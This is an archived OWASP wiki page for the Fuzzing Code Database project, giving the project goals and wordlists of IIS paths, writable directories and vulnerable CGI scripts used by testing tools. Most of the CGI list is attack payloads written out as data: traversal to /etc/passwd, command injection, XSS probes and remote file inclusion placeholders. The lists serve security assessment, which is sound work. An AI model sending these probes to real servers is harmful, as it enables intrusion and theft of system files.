| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81046</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81046"/>
				<updated>2010-04-06T21:27:00Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (6 April 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft IIS vulnerabilities and enumeration (6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Microsoft IIS vulnerabilities and enumeration (6 April, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly writable directories (6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly writable directories&lt;br /&gt;
 (6 April, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
